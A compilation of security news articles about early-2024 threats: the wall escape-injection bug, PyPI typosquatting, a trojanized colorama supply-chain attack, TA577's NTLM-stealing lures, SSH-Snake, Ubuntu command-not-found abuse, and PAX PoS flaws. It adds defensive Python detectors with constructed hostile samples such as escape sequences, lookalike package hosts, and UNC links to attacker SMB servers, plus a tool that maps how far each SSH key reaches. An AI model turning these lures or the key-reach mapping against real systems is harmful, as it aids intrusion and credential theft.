"[CVE-2024-28085] allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and *wall is setgid*," according to the release notes. "Not all distros are affected (e.g., CentOS, RHEL, Fedora are not; Ubuntu and Debian wall is both setgid and mesg is set to y by default)."
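As an added example, and not util-linux's own code or its 2.40 fix, the following Python function shows the neutralization the advisory text calls for: before a message is written to other users' terminals, whole escape sequences (7-bit and 8-bit CSI, OSC and the other control strings, charset designations) are removed and only printable text plus newline and tab is kept. Removing the entire sequence rather than just the ESC byte matters, because a stray parameter fragment would otherwise survive as visible text. The sample message is constructed.

```python
"""Strip terminal escape sequences from a message before broadcasting it to terminals.

Added example; this is not util-linux's code nor the fix shipped in 2.40. It uses
an allowlist (printable text, newline, tab) and consumes whole ESC-introduced
sequences so that no fragment of a sequence reaches the terminal.
"""

ESC, CSI_8BIT, OSC_8BIT, ST_8BIT, BEL = "\x1b", "\x9b", "\x9d", "\x9c", "\x07"
STRING_INTRODUCERS = "]PX^_"      # OSC, DCS, SOS, PM, APC: run until BEL or ST
CHARSET_DESIGNATORS = "()*+-./"   # ESC ( B and friends take one more byte

# Constructed message mixing legitimate text with a colour code and a title-setting OSC.
SAMPLE_MESSAGE = "System going down at 18:00\n\x1b[1mSave your work\x1b[0m\x1b]0;title\x07 now"


def strip_escape_sequences(text):
    """Return text with control characters and whole escape sequences removed."""
    out = []
    i, n = 0, len(text)
    while i < n:
        ch = text[i]
        if ch in (ESC, CSI_8BIT, OSC_8BIT):
            if ch == ESC:
                i += 1
                if i >= n:                 # dangling ESC at the end of the message
                    break
                kind = text[i]
            else:                          # 8-bit C1 forms of CSI and OSC
                kind = "[" if ch == CSI_8BIT else "]"
            i += 1                         # step past the introducer / kind byte
            if kind == "[":
                # CSI: parameter and intermediate bytes (0x20-0x3F), then a final byte (0x40-0x7E).
                # A malformed CSI over-consumes text, which is the safe direction.
                while i < n and not ("\x40" <= text[i] <= "\x7e"):
                    i += 1
                i += 1                     # the final byte
            elif kind in STRING_INTRODUCERS:
                # Control string: skip until BEL, 8-bit ST, or ESC \ (7-bit ST).
                while i < n:
                    if text[i] in (BEL, ST_8BIT):
                        i += 1
                        break
                    if text[i] == ESC and i + 1 < n and text[i + 1] == "\\":
                        i += 2
                        break
                    i += 1
            elif kind in CHARSET_DESIGNATORS:
                i += 1                     # one more byte selects the charset
            # any other two-character escape (ESC c, ESC 7, ...) is already consumed
            continue
        if ch in "\n\t" or ch.isprintable():
            out.append(ch)                 # allowlist: printable text, newline, tab
        i += 1
    return "".join(out)


if __name__ == "__main__":
    print(repr(strip_escape_sequences(SAMPLE_MESSAGE)))
```

The allowlist keeps non-ASCII letters (str.isprintable is True for them) while dropping every other C0 and C1 control, including carriage return and backspace, which can also be used to redraw a line.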
The disclosure comes as security researcher notselwyn detailed a use-after-free vulnerability in the netfilter subsystem in the Linux kernel that could be exploited to achieve local privilege escalation.
Assigned the CVE identifier CVE-2024-1086 (CVSS score: 7.8), the underlying issue stems from input sanitization failure of netfilter verdicts, allowing a local attacker to cause a denial-of-service (DoS) condition or possibly execute arbitrary code. It has been addressed in a commit pushed on January 24, 2024.
PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers
29.3.24 Hacking The Hacker News
The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign.
It said "new project creation and new user registration" was temporarily halted to mitigate what it said was a "malware upload campaign." The incident was resolved 10 hours later, on March 28, 2024, at 12:56 p.m. UTC.
Software supply chain security firm Checkmarx said the unidentified threat actors behind flooding the repository targeted developers with typosquatted versions of popular packages.
"This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc.), and various credentials," researchers Yehuda Gelb, Jossef Harush Kadouri, and Tzachi Zornstain said. "In addition, the malicious payload employed a persistence mechanism to survive reboots."
The findings were also corroborated independently by Mend.io, which noted that it detected more than 100 malicious packages targeting machine learning (ML) libraries such as Pytorch, Matplotlib, and Selenium.
The development comes as open-source repositories are increasingly becoming an attack vector for threat actors to infiltrate enterprise environments.
Typosquatting is a well-documented attack technique in which adversaries upload packages with names closely resembling their legitimate counterparts (e.g., Matplotlib vs. Matplotlig or tensorflow vs. tensourflow) in order to trick unsuspecting users into downloading them.
These deceptive variants – totalling over 500 packages, per Check Point – were each uploaded from a unique account starting March 26, 2024, suggesting that the whole process was automated.
"The decentralized nature of the uploads, with each package attributed to a different user, complicates efforts to cross-identify these malicious entries," the Israeli cybersecurity company said.
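An added Python example (not code from PyPI, Checkmarx, Check Point or Phylum) of the kind of check that catches such near-miss names before a dependency is installed: names are normalized per PEP 503, compared against an allowlist of popular packages using optimal-string-alignment distance so that swapped adjacent letters count as one edit, and flagged when within a length-dependent edit budget. The POPULAR set and the thresholds are assumptions; a real deployment would load the most-downloaded package names.

```python
"""Flag package names that are near-misses of popular PyPI package names.

Added example; not code from PyPI or any of the vendors in the article. POPULAR is a
constructed allowlist and max_allowed_distance is an assumed policy.
"""
import re

# Constructed allowlist of legitimate names (assumption; load a real top-N list in practice).
POPULAR = {"requests", "matplotlib", "tensorflow", "colorama", "selenium",
           "beautifulsoup4", "torch", "pillow", "numpy", "flask", "django"}


def normalize(name):
    """PEP 503 normalization: case-insensitive, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, adjacent transposition."""
    m, n = len(a), len(b)
    d = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        d[i][0] = i
    for j in range(n + 1):
        d[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[m][n]


def max_allowed_distance(popular_name):
    """Assumed policy: longer names tolerate more edits; very short names are too noisy."""
    if len(popular_name) >= 10:
        return 2
    if len(popular_name) >= 5:
        return 1
    return 0


def find_typosquats(candidates, popular=POPULAR):
    """Return {candidate: (closest_popular_name, distance)} for names within budget."""
    pop = {normalize(p) for p in popular}
    hits = {}
    for raw in candidates:
        cand = normalize(raw)
        if cand in pop:
            continue                     # the genuine package, not a look-alike
        best = None
        for p in pop:
            dist = osa_distance(cand, p)
            if dist <= max_allowed_distance(p) and (best is None or dist < best[1]):
                best = (p, dist)
        if best is not None:
            hits[raw] = best
    return hits


if __name__ == "__main__":
    # Constructed candidates, including the article's Matplotlig / tensourflow examples.
    for name, (target, dist) in find_typosquats(
            ["Matplotlig", "tensourflow", "reqeusts", "requests", "django"]).items():
        print(f"{name} -> looks like {target} (distance {dist})")
```

Run as a pre-install hook or over a lockfile, the check stops the obvious variants listed above; it does not replace registry-side controls, since a distance-1 name can also be a legitimate fork.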
Cybersecurity firm Phylum, which has also been tracking the same campaign, said the attackers published -
67 variations of requirements
38 variations of Matplotlib
36 variations of requests
35 variations of colorama
29 variations of tensorflow
28 variations of selenium
26 variations of BeautifulSoup
26 variations of PyTorch
20 variations of pillow
15 variations of asyncio
The packages, for their part, check whether the installing host runs Windows and, if so, download and execute an obfuscated payload retrieved from an actor-controlled domain ("funcaptcha[.]ru").
The malware functions as a stealer, exfiltrating files, Discord tokens, as well as data from web browsers and cryptocurrency wallets to the same server. It further attempts to download a Python script ("hvnc.py") to the Windows Startup folder for persistence.
The development once again illustrates the escalating risk posed by software supply chain attacks, making it crucial that developers scrutinize every third-party component before pulling it into a build.
This is not the first time PyPI has resorted to such a measure. In May 2023, it temporarily disabled user sign-ups after finding that the "volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion."
PyPI suspended new user registrations a second time last year, on December 27, for similar reasons. The suspension was lifted on January 2, 2024.
Hackers Hijack GitHub Accounts in Supply Chain Attack Affecting Top-gg and Others
26.3.24 Hacking The Hacker News
Unidentified adversaries orchestrated a sophisticated attack campaign that has impacted several individual developers as well as the GitHub organization account associated with Top.gg, a Discord bot discovery site.
"The threat actors used multiple TTPs in this attack, including account takeover via stolen browser cookies, contributing malicious code with verified commits, setting up a custom Python mirror, and publishing malicious packages to the PyPI registry," Checkmarx said in a technical report shared with The Hacker News.
The software supply chain attack is said to have led to the theft of sensitive information, including passwords, credentials, and other valuable data. Some aspects of the campaign were previously disclosed at the start of the month by an Egypt-based developer named Mohammed Dief.
It chiefly entailed setting up a clever typosquat of the official PyPI domain known as "files.pythonhosted[.]org," giving it the name "files.pypihosted[.]org" and using it to host trojanized versions of well-known packages like colorama. Cloudflare has since taken down the domain.
"The threat actors took Colorama (a highly popular tool with 150+ million monthly downloads), copied it, and inserted malicious code," Checkmarx researchers said. "They then concealed the harmful payload within Colorama using space padding and hosted this modified version on their typosquatted-domain fake-mirror."
These rogue packages were then propagated via GitHub repositories such as github[.]com/maleduque/Valorant-Checker and github[.]com/Fronse/League-of-Legends-Checker that contained a requirements.txt file, which serves as the list of Python packages to be installed by the pip package manager.
One repository that was still active at the time of writing is github[.]com/whiteblackgang12/Discord-Token-Generator, which includes a reference to the malicious version of colorama hosted on "files.pypihosted[.]org."
Also altered as part of the campaign was the requirements.txt file of Top.gg's python-sdk, modified by an account named editor-syntax on February 20, 2024. The issue has been addressed by the repository maintainers.
It's worth noting that the "editor-syntax" account is a legitimate maintainer of the Top.gg GitHub organization and has write permissions to Top.gg's repositories, indicating that the threat actor managed to hijack the verified account in order to make a malicious commit.
"The GitHub account of 'editor-syntax' was likely hijacked through stolen cookies," Checkmarx noted.
"The attacker gained access to the account's session cookies, allowing them to bypass authentication and perform malicious activities using the GitHub UI. This method of account takeover is particularly concerning, as it does not require the attacker to know the account's password."
What's more, the threat actors behind the campaign are said to have pushed multiple changes to the rogue repositories in one single commit, altering as many as 52 files in one instance in an effort to conceal the changes to the requirements.txt file.
The activity is believed to have commenced back in November 2022, when the attackers uploaded a series of four counterfeit packages to the PyPI repository. Subsequently, 10 other packages made their way to PyPI, the most recent being "yocolor" that was published on March 5, 2024.
"Yocolor" is also engineered to propagate the malware-laced "colorama" package, underscoring the threat actor's exploitation of the trust in the open-source package ecosystem to install the rogue library by listing it as a dependency in the project's requirements.txt file.
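The two abuses described on this page, typosquatted package names (the Matplotlig and tensourflow variants in the PyPI flood covered earlier) and a lookalike download host smuggled into requirements.txt, can be caught by the same pre-install check. The following Python audit is an added example and not code from Checkmarx, Check Point or pip; the popular-package allowlist, the trusted-host list and the sample requirements file are constructed assumptions to replace with your own.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist of popular package names (PEP 503-normalized); in practice
# seed this from the projects you actually depend on or from PyPI download stats.
POPULAR_PACKAGES = {
    "requests", "matplotlib", "colorama", "tensorflow", "selenium",
    "beautifulsoup4", "torch", "pillow", "asyncio", "numpy", "pandas",
}
# Hosts a pip invocation is allowed to fetch from; anything else is reported.
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}

URL_RE = re.compile(r"(?:https?|ftp|file)://[^\s#]+", re.IGNORECASE)
NAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?")


def normalize(name):
    """PEP 503 name normalization: case-fold and collapse runs of -, _ and . to a dash."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Edit distance; cheap enough for short package names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_requirements(text, popular=POPULAR_PACKAGES, trusted_hosts=TRUSTED_HOSTS):
    """Return findings for lookalike package names and non-trusted download hosts."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        # pip treats '#' as a comment only at line start or after whitespace,
        # so a '#sha256=' URL fragment survives this split.
        line = re.split(r"(?:^|\s)#", raw, maxsplit=1)[0].strip()
        if not line:
            continue

        # Any URL on the line (index options, '@' direct references, bare archive URLs)
        # must point at a trusted host; a lookalike such as files.pypihosted.org is flagged.
        for url in URL_RE.findall(line):
            host = (urlsplit(url).hostname or "").lower()
            if host and host not in trusted_hosts:
                findings.append({"line": lineno, "kind": "untrusted-host", "detail": host})

        if line.startswith("-"):
            continue  # option line (-r, -e, --index-url ...), no package name to check
        match = NAME_RE.match(line)
        if not match:
            continue
        name = normalize(match.group(0))
        if name in popular:
            continue
        closest = min(popular, key=lambda p: levenshtein(name, p))
        # Tolerate two edits for longer names, one for short ones, to limit false positives.
        budget = 2 if len(name) >= 8 else 1
        if levenshtein(name, closest) <= budget:
            findings.append({"line": lineno, "kind": "lookalike-name",
                             "detail": f"{name} resembles {closest}"})
    return findings


# Constructed sample requirements.txt mixing legitimate pins with the kinds of entries
# seen in the campaigns above (typosquatted names, a lookalike download host).
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
matplotlig==3.8.0          # one edit away from matplotlib
tensourflow>=2.15          # one edit away from tensorflow
colorama @ https://files.pypihosted.org/packages/colorama-0.4.6.tar.gz
--extra-index-url https://pypi.org/simple
pillow
"""

if __name__ == "__main__":
    for finding in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {finding['line']}: {finding['kind']}: {finding['detail']}")
```

Run it against a repository's requirements.txt before the first pip install; the host check is the more reliable of the two, because a correctly spelled dependency fetched from a lookalike mirror, as in the colorama case, produces no name-distance signal at all.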
The malware embedded in the counterfeit colorama package activates a multi-stage infection sequence that leads to the execution of Python code from a remote server, which, in turn, is capable of establishing persistence on the host via Windows Registry changes and stealing data from web browsers, crypto wallets, Discord tokens, and session tokens related to Instagram and Telegram.
"The malware includes a file stealer component that searches for files with specific keywords in their names or extensions," the researchers said. "It targets directories such as Desktop, Downloads, Documents, and Recent Files."
The captured data is ultimately transferred to the attackers via anonymous file-sharing services like GoFile and Anonfiles. Alternatively, the data is sent to the threat actor's infrastructure using HTTP requests, alongside the hardware identifier or IP address to track the victim machine.
"This campaign is a prime example of the sophisticated tactics employed by malicious actors to distribute malware through trusted platforms like PyPI and GitHub," the researchers concluded.
"This incident highlights the importance of vigilance when installing packages and repositories even from trusted sources. It is crucial to thoroughly vet dependencies, monitor for suspicious network activity, and maintain robust security practices to mitigate the risk of falling victim to such attacks."
Update
The repository "github[.]com/whiteblackgang12/Discord-Token-Generator" is now no longer accessible on GitHub.
Warning: Thread Hijacking Attack Targets IT Networks, Stealing NTLM Hashes
5.3.24 Hacking The Hacker News
The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.
The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.
At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.
The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.
The ZIP attachments come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.
"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said.
What the rogue SMB server captures is a NetNTLMv2 challenge/response pair rather than the account's NT hash. Such pairs are typically cracked offline to recover the password, or relayed in real time to another service that accepts NTLM authentication; they cannot be replayed directly in a classic pass-the-hash (PtH) attack, which requires the NT hash itself. Either route ends in the same place: an adversary holding a usable hash no longer needs the underlying password to authenticate, and can move through the network and gain unauthorized access to valuable data.
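As an added example (not Proofpoint's tooling), here is a Python scanner that pulls every file: URL and UNC path out of an HTML attachment and reports those pointing at hosts outside RFC 1918, loopback or link-local space, which is the shape of lure described above. The sample attachment and the TEST-NET addresses in it are constructed for the demonstration, and the internal-address ranges are an assumption to adjust per environment.

```python
import ipaddress
import re
from html.parser import HTMLParser

# Matches file: URLs and UNC paths (\\host\share, //host/share) and captures the host.
# The lookbehind keeps http://host from matching on its "//".
SMB_REF_RE = re.compile(
    r"(?P<ref>(?:file:(?:\\\\|//)+|\\\\|(?<![:/\w])//)"
    r"(?P<host>[A-Za-z0-9][A-Za-z0-9.\-]*)[\\/][^\s<>\x22\x27]*)",
    re.IGNORECASE,
)

# Address space treated as "inside" the network; listed explicitly instead of relying on
# ipaddress.is_private so the verdict does not change between Python versions.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


class _TextCollector(HTMLParser):
    """Collects every attribute value and text node, remembering where it came from."""

    def __init__(self):
        super().__init__()
        self.chunks = []  # (location, text)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value:
                self.chunks.append((f"{tag}[{name}]", value))

    def handle_data(self, data):
        if data.strip():
            self.chunks.append(("text", data))


def is_external_host(host, trusted=frozenset()):
    """True if host is an IP outside INTERNAL_NETS or a DNS name not on the trusted list."""
    if host.lower() in trusted:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host  # bare NetBIOS-style names are treated as internal
    return not any(ip in net for net in INTERNAL_NETS)


def find_smb_lures(html, trusted=frozenset()):
    """Return every file:/UNC reference in the HTML whose host is outside the network."""
    collector = _TextCollector()
    collector.feed(html)
    findings = []
    for location, text in collector.chunks:
        for match in SMB_REF_RE.finditer(text):
            host = match.group("host")
            if is_external_host(host, trusted):
                findings.append({"location": location, "host": host,
                                 "reference": match.group("ref")})
    return findings


# Constructed sample attachment: a meta refresh and an image both pointing at TEST-NET
# addresses standing in for attacker SMB servers, plus two benign references.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.10/share/invoice.txt">
</head><body>
<img src="\\\\198.51.100.7\\docs\\logo.png">
<a href="https://example.com/">read more</a>
<img src="file://10.0.0.5/internal/banner.png">
</body></html>"""

if __name__ == "__main__":
    for finding in find_smb_lures(SAMPLE_HTML):
        print(f"{finding['location']}: outbound SMB to {finding['host']} via {finding['reference']}")
```

Wire it into the mail gateway's attachment pipeline for .html files (including those inside ZIP archives) and treat any hit as a block; the scanner complements, rather than replaces, the outbound TCP/445 block recommended below, since a browser may also be pushed toward SMB through scripts the parser does not evaluate.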
TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.
"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.
It also described the threat actor as acutely aware of the shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are highly recommended to block outbound SMB (TCP port 445) at the network edge to prevent exploitation.
Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks
22.2.24 Hacking The Hacker News
A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors to conduct malicious activities.
"SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network," Sysdig researcher Miguel Hernández said.
"The worm automatically searches through known credential locations and shell history files to determine its next move."
SSH-Snake was first released on GitHub in early January 2024, and is described by its developer as a "powerful tool" to carry out automatic network traversal using SSH private keys discovered on systems.
In doing so, it creates a comprehensive map of a network and its dependencies, helping determine the extent to which a network can be compromised using SSH and SSH private keys starting from a particular host. It also supports resolution of domains which have multiple IPv4 addresses.
"It's completely self-replicating and self-propagating – and completely fileless," according to the project's description. "In many ways, SSH-Snake is actually a worm: It replicates itself and spreads itself from one system to another as far as it can."
Sysdig said the shell script not only facilitates lateral movement, but also provides more stealth and flexibility than other typical SSH worms.
The cloud security company said it observed threat actors deploying SSH-Snake in real-world attacks to harvest credentials, the IP addresses of the targets, and the bash command history following the discovery of a command-and-control (C2) server hosting the data.
"The usage of SSH keys is a recommended practice that SSH-Snake tries to take advantage of in order to spread," Hernández said. "It is smarter and more reliable which will allow threat actors to reach farther into a network once they gain a foothold."
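To see what SSH-Snake has to work with on a compromised host, this added Python example (not SSH-Snake's own code, and written as a defender's audit rather than a worm) resolves the ssh, scp and rsync targets found in a shell history against ~/.ssh/config and reports which private key reaches how many hosts. The history, config, host names and key paths are constructed sample data; the parser handles only exact Host aliases and Host * defaults, and it reads nothing from the real filesystem.

```python
import re

# ssh/scp/rsync invocations and their arguments up to the next shell operator
REMOTE_CMD_RE = re.compile(r"(?:^|[\s;&|(])(?P<cmd>ssh|scp|rsync)\s+(?P<args>[^;&|\n]*)")
KEY_FLAG_RE = re.compile(r"(?:^|\s)-i\s+(\S+)")
# ssh options that consume the following token, so it is not mistaken for a destination
_VALUE_OPTIONS = {"-i", "-p", "-P", "-o", "-l", "-F", "-J", "-e", "-L", "-R", "-D", "-b", "-c", "-m"}
DEFAULT_IDENTITY = "(default identity)"  # ssh would try id_rsa, id_ecdsa, id_ed25519 ...


def parse_ssh_config(text):
    """Minimal ~/.ssh/config parser: exact Host aliases plus the Host * defaults."""
    hosts, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "host":
            current = hosts.setdefault(value, {})
        elif current is not None and key in ("hostname", "user", "identityfile"):
            current[key] = value
    return hosts


def _destinations(cmd, args):
    """Yield the remote endpoints named in one ssh/scp/rsync command."""
    skip = False
    for tok in args.split():
        if skip:
            skip = False
            continue
        if tok in _VALUE_OPTIONS:
            skip = True
            continue
        if tok.startswith("-"):
            continue
        if cmd == "ssh":
            yield tok          # first non-option token is [user@]host
            return
        if "@" in tok or (":" in tok and not tok.startswith("/")):
            yield tok          # scp/rsync remote operand: [user@]host:path


def enumerate_hops(history_text, ssh_config_text, current_user):
    """Resolve every remote target in shell history to a (user, host, key) hop."""
    config = parse_ssh_config(ssh_config_text)
    defaults = config.get("*", {})
    hops = set()
    for line in history_text.splitlines():
        for m in REMOTE_CMD_RE.finditer(line):
            key_match = KEY_FLAG_RE.search(m.group("args"))
            explicit_key = key_match.group(1) if key_match else None
            for dest in _destinations(m.group("cmd"), m.group("args")):
                user, _, hostpart = dest.rpartition("@")
                alias = hostpart.split(":", 1)[0]
                entry = config.get(alias, {})
                hops.add((
                    user or entry.get("user") or defaults.get("user") or current_user,
                    entry.get("hostname", alias),
                    explicit_key or entry.get("identityfile")
                    or defaults.get("identityfile") or DEFAULT_IDENTITY,
                ))
    return sorted(hops)


def key_blast_radius(hops):
    """Map each private key to the hosts it reaches; the widest key is the worm's best find."""
    reach = {}
    for _user, host, key in hops:
        reach.setdefault(key, set()).add(host)
    return reach


# Constructed sample data standing in for ~/.bash_history and ~/.ssh/config.
SAMPLE_HISTORY = """\
ls -la
ssh deploy@10.0.4.12 -i ~/.ssh/deploy_key
scp backup.tgz ops@backup01.corp.example:/var/backups/
ssh db-primary
git push origin main
ssh -p 2222 admin@jump.example.net 'uptime'
"""
SAMPLE_SSH_CONFIG = """\
Host db-primary
    HostName 10.0.9.5
    User postgres
    IdentityFile ~/.ssh/db_ed25519

Host *
    IdentityFile ~/.ssh/id_ed25519
"""

if __name__ == "__main__":
    hops = enumerate_hops(SAMPLE_HISTORY, SAMPLE_SSH_CONFIG, current_user="root")
    for key, hosts in key_blast_radius(hops).items():
        print(f"{key}: {len(hosts)} host(s) -> {sorted(hosts)}")
```

The blast-radius view is the point of the exercise: a single shared identity file in a Host * block (here ~/.ssh/id_ed25519) is what lets one compromised host fan out, so per-destination keys, passphrases or agent-forwarding limits reduce how far an automated traversal can get.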
When reached for comment, Joshua Rogers, the developer of SSH-Snake, told The Hacker News that the tool offers legitimate system owners a way to identify weaknesses in their infrastructure before attackers do, urging companies to use SSH-Snake to "discover the attack paths that exist – and fix them."
"It seems to be commonly believed that cyber terrorism 'just happens' all of a sudden to systems, which solely requires a reactive approach to security," Rogers said. "Instead, in my experience, systems should be designed and maintained with comprehensive security measures."
"If a cyber terrorist is able to run SSH-Snake on your infrastructure and access thousands of servers, focus should be put on the people that are in charge of the infrastructure, with a goal of revitalizing the infrastructure such that the compromise of a single host can't be replicated across thousands of others."
Rogers also called attention to the "negligent operations" by companies that design and implement insecure infrastructure, which can be easily taken over by a simple shell script.
"If systems were designed and maintained in a sane manner and system owners/companies actually cared about security, the fallout from such a script being executed would be minimized - as well as if the actions taken by SSH-Snake were manually performed by an attacker," Rogers added.
"Instead of reading privacy policies and performing data entry, security teams of companies worried about this type of script taking over their entire infrastructure should be performing total re-architecture of their systems by trained security specialists – not those that created the architecture in the first place."
The disclosure comes as Aqua uncovered a new botnet campaign named Lucifer that exploits misconfigurations and existing flaws in Apache Hadoop and Apache Druid to corral them into a network for mining cryptocurrency and staging distributed denial-of-service (DDoS) attacks.
The hybrid cryptojacking malware was first documented by Palo Alto Networks Unit 42 in June 2020, calling attention to its ability to exploit known security flaws to compromise Windows endpoints.
As many as 3,000 distinct attacks aimed at the Apache big data stack have been detected over the past month, the cloud security firm said. This also comprises those that single out susceptible Apache Flink instances to deploy miners and rootkits.
"The attacker implements the attack by exploiting existing misconfigurations and vulnerabilities in those services," security researcher Nitzan Yaakov said.
"Apache open-source solutions are widely used by many users and contributors. Attackers may view this extensive use as an opportunity to have inexhaustible resources for implementing their attacks on them."
Ubuntu 'command-not-found' Tool Could Trick Users into Installing Rogue Packages
17.2.24 Hacking The Hacker News
Cybersecurity researchers have found that it's possible for threat actors to exploit a well-known utility called command-not-found to recommend their own rogue packages and compromise systems running Ubuntu operating system.
"While 'command-not-found' serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the snap repository, leading to deceptive recommendations of malicious packages," cloud security firm Aqua said in a report shared with The Hacker News.
Installed by default on Ubuntu systems, command-not-found suggests packages to install in interactive bash sessions when attempting to run commands that are not available. The suggestions include both the Advanced Packaging Tool (APT) and snap packages.
While the tool uses an internal database ("/var/lib/command-not-found/commands.db") to suggest APT packages, it relies on the "advise-snap" command to suggest snaps that provide the given command.
Thus, should an attacker be able to game this system and have their malicious package recommended by the command-not-found package, it could pave the way for software supply chain attacks.
Aqua said it found a security loophole wherein the alias mechanism can be exploited by the threat actor to potentially register the corresponding snap name associated with an alias and trick users into installing the malicious package.
What's more, an attacker could claim the snap name related to an APT package and upload a malicious snap, which then ends up being suggested when a user types in the command on their terminal.
"The maintainers of the 'jupyter-notebook' APT package had not claimed the corresponding snap name," Aqua security researcher Ilay Goldman said. "This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named 'jupyter-notebook.'"
To make matters worse, the command-not-found utility suggests the snap package above the legitimate APT package for jupyter-notebook, misleading users into installing the fake snap package.
As many as 26% of the APT package commands are vulnerable to impersonation by malicious actors, Aqua noted, presenting a substantial security risk, as they could be registered under an attacker's account.
A third category entails typosquatting attacks in which typographical errors made by users (e.g., ifconfigg instead of ifconfig) are leveraged to suggest bogus snap packages by registering a fraudulent package with the name "ifconfigg."
In such a case, command-not-found "would mistakenly match it to this incorrect command and recommend the malicious snap, bypassing the suggestion for 'net-tools' altogether," Aqua researchers explained.
Describing the abuse of the command-not-found utility to recommend counterfeit packages as a pressing concern, the company is urging users to verify the source of a package before installation and check the maintainers' credibility.
Developers of APT and snap packages have also been advised to register the associated snap name for their commands to prevent them from being misused.
"It remains uncertain how extensively these capabilities have been exploited, underscoring the urgency for heightened vigilance and proactive defense strategies," Aqua said.
PAX PoS Terminal Flaw Could Allow Attackers to Tamper with Transactions
18.1.24 Hacking The Hacker News
The point-of-sale (PoS) terminals from PAX Technology are impacted by a collection of high-severity vulnerabilities that can be weaponized by threat actors to execute arbitrary code.
The STM Cyber R&D team, which reverse engineered the Android-based devices manufactured by the Chinese firm owing to their rapid deployment in Poland, said it unearthed half a dozen flaws that allow for privilege escalation and local code execution from the bootloader.
Details about one of the vulnerabilities (CVE-2023-42133) have been currently withheld. The other flaws are listed below -
CVE-2023-42134 & CVE-2023-42135 (CVSS score: 7.6) - Local code execution as root via kernel parameter injection in fastboot (Impacts PAX A920Pro/PAX A50)
CVE-2023-42136 (CVSS score: 8.8) - Privilege escalation from any user/application to system user via shell injection in a binder-exposed service (Impacts All Android-based PAX PoS devices)
CVE-2023-42137 (CVSS score: 8.8) - Privilege escalation from system/shell user to root via insecure operations in systool_server daemon (Impacts All Android-based PAX PoS devices)
CVE-2023-4818 (CVSS score: 7.3) - Bootloader downgrade via improper tokenization (Impacts PAX A920)
Successful exploitation of the aforementioned weaknesses could permit an attacker to elevate their privileges to root and bypass sandboxing protections, effectively gaining carte blanche access to perform any operation.
This includes interfering with the payment operations to "modify data the merchant application sends to the [Secure Processor], which includes transaction amount," security researchers Adam Kliś and Hubert Jasudowicz said.
It's worth mentioning that exploiting CVE-2023-42136 and CVE-2023-42137 requires an attacker to have shell access to the device, while the remaining three necessitate that the threat actor has physical USB access to it.
The Warsaw-based penetration testing company said it responsibly disclosed the flaws to PAX Technology in early May 2023, following which patches were released by the latter in November 2023.
New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms
12.1.24 Hacking The Hacker News
A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio.
"Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.
